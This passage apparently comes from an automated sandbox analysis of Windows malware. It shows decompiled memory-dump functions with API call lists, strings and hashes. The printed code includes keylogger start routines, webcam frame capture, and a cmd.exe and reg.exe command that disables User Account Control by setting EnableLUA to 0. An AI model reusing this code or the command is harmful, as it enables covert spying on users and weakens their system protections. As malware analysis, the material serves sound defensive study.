                              					} while (_t69 != 0);
                              					_t76 = _t79 - _t81;
                              					goto L8;
                              					L21:
                              					_t85 = _t86 + 1;
                              				} while (_t86 != 0);
                              				if(_t91 != 0) {
                              					_push(_t76);
                              					 *_t72 = _v20;
                              					 *((char*)(_t72 + 0x154)) = 1;
                              					L00418C8B(_t72, _v8, _v24, _t76, 1);
                              				}
                              				return _t91;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _strncpy
                              • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                              • API String ID: 2961919466-1012175531
                              • Opcode ID: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
                              • Instruction ID: 78e21791db2732ee694d72da95f641054b580d27861932b645a039a5d5b4fa6f
                              • Opcode Fuzzy Hash: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
                              • Instruction Fuzzy Hash: 2E513735D043099BDF20AAA888857FFB7B9DB44304F14406FEC51A7382E7798986C7E9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E00408744(void* __ecx, char _a4) {
                              				char _v28;
                              				char _v32;
                              				void* _v56;
                              				void* __ebx;
                              				void* __edi;
                              				void* _t21;
                              				void* _t39;
                              				signed int _t41;
                              				void* _t43;
                              
                              				_t43 = (_t41 & 0xfffffff8) - 0x1c;
                              				_push(_t21);
                              				_t39 = __ecx;
                              				_t2 = _t39 + 0x60; // 0x46c3b0
                              				 *((char*)(__ecx + 0x49)) = 1;
                              				L00409DD4(_t2,  &_a4);
                              				_t47 =  *0x46a9d4 - 0x32;
                              				_t35 = "Offline Keylogger Started";
                              				if( *0x46a9d4 != 0x32) {
                              					E00402064(_t21,  &_v28, "Offline Keylogger Started");
                              					_t43 = _t43 - 0x18;
                              					L00416C32(_t43,  &_v32);
                              					E00409636(_t21, _t39, _t47);
                              					L00401FA7();
                              				}
                              				_t44 = _t43 - 0x18;
                              				E00402064(_t21, _t43 - 0x18, _t35);
                              				E00402064(_t21, _t44 - 0x18, "[Info]");
                              				E004165D8(_t21, _t35);
                              				CreateThread(0, 0, 0x40884d, _t39, 0, 0);
                              				if( *_t39 == 0) {
                              					CreateThread(0, 0, E00408832, _t39, 0, 0);
                              				}
                              				CreateThread(0, 0, E0040885C, _t39, 0, 0);
                              				return L00401ED0();
                              			}

                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,0040884D,0046C350,00000000,00000000), ref: 004087CC
                              • CreateThread.KERNEL32(00000000,00000000,00408832,0046C350,00000000,00000000), ref: 004087DC
                              • CreateThread.KERNEL32(00000000,00000000,0040885C,0046C350,00000000,00000000), ref: 004087E8
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CreateThread$EventLocalTimewsprintf
                              • String ID: Offline Keylogger Started$[Info]
                              • API String ID: 3534694722-3531117058
                              • Opcode ID: a0d024ad8c9949b0735535353f752cbf97b3fdb91e3ab862432188692a5b43dd
                              • Instruction ID: 917e057f81a48fe8b587d187e59d983f8dfdf23781fe50dc9a014371862e48e5
                              • Opcode Fuzzy Hash: a0d024ad8c9949b0735535353f752cbf97b3fdb91e3ab862432188692a5b43dd
                              • Instruction Fuzzy Hash: AB1198A25003083AD224B7369D86DBF3A5DDA81398F80453FF985221C3DE785E08C6FA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E004093AF(void* __ecx) {
                              				char _v28;
                              				void* __ebx;
                              				void* __edi;
                              				void* _t7;
                              				void* _t18;
                              				void* _t30;
                              				void* _t31;
                              				void* _t32;
                              
                              				_t30 = __ecx;
                              				_t36 =  *((char*)(__ecx + 0x4a));
                              				if( *((char*)(__ecx + 0x4a)) == 0) {
                              					_t28 = "Online Keylogger Started";
                              					 *((char*)(__ecx + 0x4a)) = 1;
                              					E00402064(_t18,  &_v28, "Online Keylogger Started");
                              					_t32 = _t31 - 0x18;
                              					L00416C32(_t32,  &_v28);
                              					E00409636(_t18, _t30, _t36);
                              					L00401FA7();
                              					_t33 = _t32 - 0x18;
                              					E00402064(_t18, _t32 - 0x18, "Online Keylogger Started");
                              					E00402064(_t18, _t33 - 0x18, "[Info]");
                              					E004165D8(_t18, _t28);
                              					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
                              						if( *_t30 == 0) {
                              							CreateThread(0, 0, E00408832, _t30, 0, 0);
                              						}
                              						CreateThread(0, 0, E0040885C, _t30, 0, 0);
                              					}
                              					return CreateThread(0, 0, E0040886B, _t30, 0, 0);
                              				}
                              				return _t7;
                              			}

                              APIs
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00008832,?,00000000,00000000), ref: 0040942F
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000885C,?,00000000,00000000), ref: 0040943B
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000886B,?,00000000,00000000), ref: 00409447
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTime$Eventwsprintf
                              • String ID: Online Keylogger Started$[Info]
                              • API String ID: 3546759147-3401407043
                              • Opcode ID: c33eb4240faf0f86eb9778156269051690524317534ddc2cfd41fbbcecfdff3d
                              • Instruction ID: 8fb703469506888dfee9d4bbb0c2098ebf9b351c4befbe7097037b3d6031c6da
                              • Opcode Fuzzy Hash: c33eb4240faf0f86eb9778156269051690524317534ddc2cfd41fbbcecfdff3d
                              • Instruction Fuzzy Hash: 0101A591A003183AD62076765D8BD7F7A5DCA82398F80447FFA81322C3D97D5D0982FA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 70%
                              			E00418732() {
                              				char _v20;
                              				struct _WNDCLASSEXA _v68;
                              				void* __edi;
                              				struct HWND__* _t20;
                              				void* _t23;
                              
                              				E00431810(_t23,  &(_v68.style), 0, 0x2c);
                              				_v68.cbSize = 0x30;
                              				_v68.style = 0;
                              				_v68.lpfnWndProc = E004187B2;
                              				_v68.cbClsExtra = 0;
                              				asm("movsd");
                              				_v68.lpszClassName =  &_v20;
                              				_v68.cbWndExtra = 0;
                              				asm("movsd");
                              				_v68.lpszMenuName = 0;
                              				asm("movsd");
                              				asm("movsw");
                              				asm("movsb");
                              				if(RegisterClassExA( &_v68) == 0) {
                              					L3:
                              					return 0;
                              				}
                              				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                              				if(_t20 == 0) {
                              					GetLastError();
                              					goto L3;
                              				}
                              				return _t20;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: aabe29d8945d597987256ed2f640e589badf12c9ea9fd14bed4f02890446ac43
                              • Instruction ID: 39839075c33bffd586aacb37a79c17ebe23a35f30f2176b7e199aa3a0e24e00b
                              • Opcode Fuzzy Hash: aabe29d8945d597987256ed2f640e589badf12c9ea9fd14bed4f02890446ac43
                              • Instruction Fuzzy Hash: 150125B5D0021CABDB00DFE5DC849EFBBBCFB04395F50493AF814A6240EB749A058AA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 19%
                              			E00432621(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                              				void* __edi;
                              				void* __ebp;
                              				intOrPtr _t24;
                              				void* _t26;
                              				void* _t27;
                              				void* _t28;
                              				intOrPtr _t29;
                              				intOrPtr* _t31;
                              				void* _t33;
                              
                              				_t28 = __edx;
                              				_t26 = __ebx;
                              				_t35 = _a28;
                              				_t29 = _a8;
                              				if(_a28 != 0) {
                              					_push(_a28);
                              					_push(_a24);
                              					_push(_t29);
                              					_t5 =  &_a4; // 0x432a4d
                              					_push( *_t5);
                              					L00432C70(_t35);
                              					_t33 = _t33 + 0x10;
                              				}
                              				_t36 = _a40;
                              				_t7 =  &_a4; // 0x432a4d
                              				_push( *_t7);
                              				if(_a40 != 0) {
                              					_push(_a40);
                              				} else {
                              					_push(_t29);
                              				}
                              				L00431BFB(_t27);
                              				_t31 = _a32;
                              				_push( *_t31);
                              				_push(_a20);
                              				_push(_a16);
                              				_push(_t29);
                              				L00432E72(_t26, _t27, _t28, _t29, _t36);
                              				_push(0x100);
                              				_push(_a36);
                              				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                              				_t24 = _a24;
                              				_push( *((intOrPtr*)(_t24 + 0xc)));
                              				_push(_a20);
                              				_push(_a12);
                              				_push(_t29);
                              				_push(_a4);
                              				"j8h8~F"();
                              				if(_t24 != 0) {
                              					L00431BC9(_t24, _t29);
                              					return _t24;
                              				}
                              				return _t24;
                              			}

                              APIs
                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00432638
                                • Part of subcall function 00432C70: ___AdjustPointer.LIBCMT ref: 00432CBA
                              • _UnwindNestedFrames.LIBCMT ref: 0043264F
                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00432661
                              • CallCatchBlock.LIBVCRUNTIME ref: 00432685
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                              • String ID: M*C
                              • API String ID: 2633735394-129833859
                              • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                              • Instruction ID: 2b136e0aa6985e1208fe7cf03fe17269dead03c225157b686541d69b99605fa0
                              • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                              • Instruction Fuzzy Hash: 5B016932000108BBCF126F56CD02EDA3BBAFF4D714F10501AF95861121C37AE861DBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E0040D797() {
                              				struct _PROCESS_INFORMATION _v20;
                              				struct _STARTUPINFOA _v92;
                              				void* __edi;
                              				void* _t17;
                              				long _t19;
                              
                              				_t19 = 0x44;
                              				E00431810(_t17,  &_v92, 0, _t19);
                              				_v92.cb = _t19;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                              				CloseHandle(_v20);
                              				return CloseHandle(_v20.hThread);
                              			}

                              APIs
                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C964,00000000,0046C578,00000001), ref: 0040D7DB
                              • CloseHandle.KERNEL32(0040C964), ref: 0040D7EA
                              • CloseHandle.KERNEL32(00000027), ref: 0040D7EF
                              Strings
                              • C:\Windows\System32\cmd.exe, xrefs: 0040D7D6
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D7D1
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                              • API String ID: 2922976086-4183131282
                              • Opcode ID: 97c280bce6da9a9ad1c74c6fab7c90947e3a5789ca2bb85f2e0812a43c64eebe
                              • Instruction ID: 787108f511e4318509bc76900ce72c09bd06e2e4a50587c84678304a4fe04e77
                              • Opcode Fuzzy Hash: 97c280bce6da9a9ad1c74c6fab7c90947e3a5789ca2bb85f2e0812a43c64eebe
                              • Instruction Fuzzy Hash: 3FF096B290022C7EEB009BE9DC85EEFBF7CEB44795F000436F604E6020D5705D148BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00405165(void* __ecx, void* __edi) {
                              				void* __ebx;
                              				long _t19;
                              				intOrPtr _t28;
                              				void* _t29;
                              				void* _t30;
                              				void* _t31;
                              				intOrPtr _t38;
                              
                              				_t29 = __edi;
                              				_t30 = __ecx;
                              				 *((intOrPtr*)(__ecx + 0x60)) = 0;
                              				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
                              					L3:
                              					 *((char*)(_t30 + 0x50)) = 0;
                              					_t38 =  *0x46bb07; // 0x0
                              					if(_t38 != 0) {
                              						_t32 = _t31 - 0x18;
                              						E00402064(0, _t31 - 0x18, "Connection timeout");
                              						E00402064(0, _t32 - 0x18, "[WARNING]");
                              						E004165D8(0, _t29);
                              					}
                              					L00404DD5(_t30);
                              					return 1;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
                              					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
                              					_t28 =  *((intOrPtr*)(_t30 + 0x60));
                              					if(_t19 == 0) {
                              						break;
                              					}
                              					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
                              						continue;
                              					}
                              					goto L3;
                              				}
                              				CloseHandle( *(_t30 + 0x54));
                              				 *(_t30 + 0x54) = 0;
                              				 *((char*)(_t30 + 0x50)) = 0;
                              				SetEvent( *(_t30 + 0x58));
                              				return 0;
                              			}

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405160), ref: 0040517B
                              • CloseHandle.KERNEL32(?), ref: 004051D1
                              • SetEvent.KERNEL32(?), ref: 004051E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection timeout$[WARNING]
                              • API String ID: 2055531096-1470507543
                              • Opcode ID: 878cdf7f212794c94f489166eab776e44960996326cc9d1c6d2bc6825e958f7a
                              • Instruction ID: ae60f77654cc690ea069452027dfbba6838492d045179776455cce24e18ac643
                              • Opcode Fuzzy Hash: 878cdf7f212794c94f489166eab776e44960996326cc9d1c6d2bc6825e958f7a
                              • Instruction Fuzzy Hash: C301D431A04F40AFC725BF35895651BBFA1EF0134A740083EE48396AA2CBB99408CB4A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00410420(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, char _a20) {
                              				void* _v12;
                              				char _v1040;
                              				long _t17;
                              
                              				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
                              					L3:
                              					return 0;
                              				}
                              				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
                              				RegCloseKey(_v12);
                              				if(_t17 != 0) {
                              					goto L3;
                              				}
                              				_t7 =  &_a20; // 0x40607d
                              				L00405A2F( &_v1040, _a16,  *_t7);
                              				L00405AB6( &_v1040, _a8, _a12);
                              				return 1;
                              			}

                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
                              • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
                              • RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: origmsc$}`@
                              • API String ID: 3677997916-2850336352
                              • Opcode ID: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
                              • Instruction ID: ecacb93a6b8b5b9c49bbf3e02a5795d497c0a97730d5bb5037d868723a18005e
                              • Opcode Fuzzy Hash: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
                              • Instruction Fuzzy Hash: CF014B31900229BFCF219F91DC45EEB7F38EF05755F004165BE0862161E6358AA5DBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E00404466(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
                              				char _v8;
                              				void* _v40;
                              				char _v44;
                              				char _v52;
                              				char _v60;
                              				char _v76;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t25;
                              				char** _t27;
                              				intOrPtr* _t29;
                              				intOrPtr _t45;
                              				signed int _t54;
                              				signed int _t56;
                              				char* _t59;
                              				void* _t63;
                              				signed int _t64;
                              				void* _t66;
                              				signed int _t75;
                              				void* _t78;
                              				void* _t124;
                              				signed int _t126;
                              				signed int _t127;
                              				signed int _t128;
                              				signed int _t129;
                              				signed int _t130;
                              				signed int _t131;
                              				signed int _t135;
                              				void* _t138;
                              				void* _t139;
                              				intOrPtr* _t140;
                              
                              				_push(__edi);
                              				_t120 = _a8;
                              				_t124 = __ecx;
                              				_t25 = E004027BA(__ecx, _a8);
                              				_t78 = _t124;
                              				_t146 = _t25;
                              				if(_t25 == 0) {
                              					_push(__ebx);
                              					E00402899(_t78, __edx, 0);
                              					_t27 = E0040221F();
                              					_t75 = _a12;
                              					_a8 = _t27;
                              					_t115 =  *_t27;
                              					__eflags =  !_t115 - _t75;
                              					if( !_t115 <= _t75) {
                              						E004028B8(_t124);
                              						asm("int3");
                              						_push(_t124);
                              						_t29 = L00401F75( &_v8);
                              						E00404286( &_v8,  &_v44, 4, 0xffffffff);
                              						_t138 = (_t135 & 0xfffffff8) - 0xc;
                              						E004020CC(_t75, _t138, _t115, __eflags, 0x46c238);
                              						_t139 = _t138 - 0x18;
                              						E004020CC(_t75, _t139, _t115, __eflags,  &_v60);
                              						L00416DD0( &_v76, _t115);
                              						_t140 = _t139 + 0x30;
                              						_t126 =  *_t29 - 0x3c;
                              						__eflags = _t126;
                              						if(__eflags == 0) {
                              							_t127 = E0040A15B(L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
                              							__eflags = _t127;
                              							if(_t127 != 0) {
                              								 *0x46bac4 = E0040A1B1(_t127, "OpenCamera");
                              								 *0x46bac0 = E0040A1B1(_t127, "CloseCamera");
                              								_t45 = E0040A1B1(_t127, "GetFrame");
                              								_t115 = "FreeFrame";
                              								 *0x46bac8 = _t45;
                              								 *0x46babc = E0040A1B1(_t127, "FreeFrame");
                              								 *0x46baaa = 1;
                              								E004020CC(_t75, _t140 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
                              								_push(0x1b);
                              								goto L23;
                              							}
                              						} else {
                              							_t128 = _t126 - 1;
                              							__eflags = _t128;
                              							if(_t128 == 0) {
                              								__eflags =  *0x46ba77;
                              								if(__eflags != 0) {
                              									goto L20;
                              								}
                              							} else {
                              								_t129 = _t128 - 1;
                              								__eflags = _t129;
                              								if(_t129 == 0) {
                              									 *0x46bac0();
                              									 *0x46ba77 = 0;
                              								} else {
                              									_t130 = _t129 - 1;
                              									__eflags = _t130;
                              									if(_t130 == 0) {
                              										_t54 =  *0x46bac4();
                              										 *0x46ba77 = _t54;
                              										__eflags = _t54;
                              										if(__eflags == 0) {
                              											goto L15;
                              										} else {
                              											L20:
                              											_t115 = E00436079(_t49, L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
                              											E004046E8(_a4, _t51, __eflags);
                              										}
                              									} else {
                              										_t131 = _t130 - 1;
                              										__eflags = _t131;
                              										if(_t131 == 0) {
                              											_t56 =  *0x46bac4();
                              											 *0x46ba77 = _t56;
                              											__eflags = _t56;
                              											if(__eflags == 0) {
                              												L15:
                              												E004020CC(_t75, _t140 - 0x18, _t115, __eflags, 0x46c1b8);
                              												_push(0x41);
                              												L23:
                              												L00404A6E(_t75, _a4, _t115, __eflags);
                              											} else {
                              												_t59 = E00436079(_t57, L00401F75(L00401E29( &_v52, _t115, __eflags, _t131)));
                              												 *_t140 = 0x3e8;
                              												Sleep(??);
                              												_t115 = _t59;
                              												E004046E8(_a4, _t59, __eflags);
                              												 *0x46bac0();
                              											}
                              										}
                              									}
                              								}
                              							}
                              						}
                              						L00401E54( &_v52, _t115);
                              						L00401FA7();
                              						L00401FA7();
                              						__eflags = 0;
                              						return 0;
                              					} else {
                              						_t62 =  &(_t115[_t75]);
                              						_a12 =  &(_t115[_t75]);
                              						__eflags = _t75;
                              						if(__eflags != 0) {
                              							_push(0);
                              							_t64 = E004027F5(_t75, _t124, _t115, _t120, __eflags, _t62);
                              							__eflags = _t64;
                              							if(_t64 != 0) {
                              								_push( *_a8);
                              								_t66 = E00402209(_t124);
                              								E0040157F(E00402209(_t124) + _t75 * 2, _t66);
                              								_push(_t75);
                              								E0040156B(E00402209(_t124), _t120);
                              								E00402868(_a12);
                              							}
                              						}
                              						_t63 = _t124;
                              						goto L7;
                              					}
                              				} else {
                              					_t63 = E0040359F(__ebx, _t124, __edx, _t120 - E00402209(_t78) >> 1, _t124, _t146, _t78, _t124, _t120 - E00402209(_t78) >> 1, _a12);
                              					L7:
                              					return _t63;
                              				}
                              			}

                              APIs
                              • Sleep.KERNEL32(00000000,?), ref: 004045BB
                                • Part of subcall function 004046E8: __EH_prolog.LIBCMT ref: 004046ED
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: H_prologSleep
                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                              • API String ID: 3469354165-3547787478
                              • Opcode ID: 956d68f455a1026b978206eb89fe73a27ea02819beab721a7bcc5ef72be57ce2
                              • Instruction ID: 5a17ec9c29155d9da4fdaf8b9e23beca59789b2fbc5ce9981412f47b601f43b7
                              • Opcode Fuzzy Hash: 956d68f455a1026b978206eb89fe73a27ea02819beab721a7bcc5ef72be57ce2
                              • Instruction Fuzzy Hash: 5851E4B1604211ABCA04BB76DC5AA6E3B559BC1708F00053FF905AB7E2EF7D890587DE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E0043C2CD(signed int* __ecx, signed int __edx) {
                              				signed int _v8;
                              				intOrPtr* _v12;
                              				signed int _v16;
                              				signed int _t28;
                              				signed int _t29;
                              				intOrPtr _t33;
                              				signed int _t37;
                              				signed int _t38;
                              				signed int _t40;
                              				void* _t50;
                              				signed int _t56;
                              				intOrPtr* _t57;
                              				signed int _t68;
                              				signed int _t71;
                              				signed int _t72;
                              				signed int _t74;
                              				signed int _t75;
                              				signed int _t78;
                              				signed int _t80;
                              				signed int* _t81;
                              				signed int _t85;
                              				void* _t86;
                              
                              				_t72 = __edx;
                              				_v12 = __ecx;
                              				_t28 =  *__ecx;
                              				_t81 =  *_t28;
                              				if(_t81 != 0) {
                              					_t29 =  *0x46a00c; // 0x5d382218
                              					_t56 =  *_t81 ^ _t29;
                              					_t78 = _t81[1] ^ _t29;
                              					_t83 = _t81[2] ^ _t29;
                              					asm("ror edi, cl");
                              					asm("ror esi, cl");
                              					asm("ror ebx, cl");
                              					if(_t78 != _t83) {
                              						L14:
                              						 *_t78 = L00440C0D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                              						_t33 = E0042E9F4(_t56);
                              						_t57 = _v12;
                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042E9F4(_t78 + 4);
                              						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042E9F4(_t83);
                              						_t37 = 0;
                              						L15:
                              						return _t37;
                              					}
                              					_t38 = 0x200;
                              					_t85 = _t83 - _t56 >> 2;
                              					if(_t85 <= 0x200) {
                              						_t38 = _t85;
                              					}
                              					_t80 = _t38 + _t85;
                              					if(_t80 == 0) {
                              						_t80 = 0x20;
                              					}
                              					if(_t80 < _t85) {
                              						L9:
                              						_push(4);
                              						_t80 = _t85 + 4;
                              						_push(_t80);
                              						_v8 = E00446905(_t56);
                              						_t40 = L0043EE85(0);
                              						_t68 = _v8;
                              						_t86 = _t86 + 0x10;
                              						if(_t68 != 0) {
                              							goto L11;
                              						}
                              						_t37 = _t40 | 0xffffffff;
                              						goto L15;
                              					} else {
                              						_push(4);
                              						_push(_t80);
                              						_v8 = E00446905(_t56);
                              						L0043EE85(0);
                              						_t68 = _v8;
                              						_t86 = _t86 + 0x10;
                              						if(_t68 != 0) {
                              							L11:
                              							_t56 = _t68;
                              							_v8 = _t68 + _t85 * 4;
                              							_t83 = _t68 + _t80 * 4;
                              							_t78 = _v8;
                              							_push(0x20);
                              							asm("ror eax, cl");
                              							_t71 = _t78;
                              							_v16 = 0 ^  *0x46a00c;
                              							asm("sbb edx, edx");
                              							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                              							_v8 = _t74;
                              							if(_t74 == 0) {
                              								goto L14;
                              							}
                              							_t75 = _v16;
                              							_t50 = 0;
                              							do {
                              								_t50 = _t50 + 1;
                              								 *_t71 = _t75;
                              								_t71 = _t71 + 4;
                              							} while (_t50 != _v8);
                              							goto L14;
                              						}
                              						goto L9;
                              					}
                              				}
                              				return _t28 | 0xffffffff;
                              			}

                              0x0043c2cd
                              0x0043c2d7
                              0x0043c2db
                              0x0043c2dd
                              0x0043c2e1
                              0x0043c2eb
                              0x0043c2fc
                              0x0043c301
                              0x0043c303
                              0x0043c305
                              0x0043c307
                              0x0043c309
                              0x0043c30d
                              0x0043c3c7
                              0x0043c3d5
                              0x0043c3d7
                              0x0043c3dc
                              0x0043c3e3
                              0x0043c3f3
                              0x0043c402
                              0x0043c405
                              0x0043c407
                              0x00000000
                              0x0043c408
                              0x0043c315
                              0x0043c31a
                              0x0043c31f
                              0x0043c321
                              0x0043c321
                              0x0043c323
                              0x0043c328
                              0x0043c32c
                              0x0043c32c
                              0x0043c32f
                              0x0043c34e
                              0x0043c34e
                              0x0043c350
                              0x0043c353
                              0x0043c35c
                              0x0043c35f
                              0x0043c364
                              0x0043c367
                              0x0043c36c
                              0x00000000
                              0x00000000
                              0x0043c36e
                              0x00000000
                              0x0043c331
                              0x0043c331
                              0x0043c333
                              0x0043c33c
                              0x0043c33f
                              0x0043c344
                              0x0043c347
                              0x0043c34c
                              0x0043c376
                              0x0043c379
                              0x0043c37b
                              0x0043c37e
                              0x0043c386
                              0x0043c38c
                              0x0043c393
                              0x0043c395
                              0x0043c39d
                              0x0043c3ac
                              0x0043c3b0
                              0x0043c3b2
                              0x0043c3b5
                              0x00000000
                              0x00000000
                              0x0043c3b7
                              0x0043c3ba
                              0x0043c3bc
                              0x0043c3bc
                              0x0043c3bd
                              0x0043c3bf
                              0x0043c3c2
                              0x00000000
                              0x0043c3bc
                              0x00000000
                              0x0043c34c
                              0x0043c32f
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free
                              • String ID:
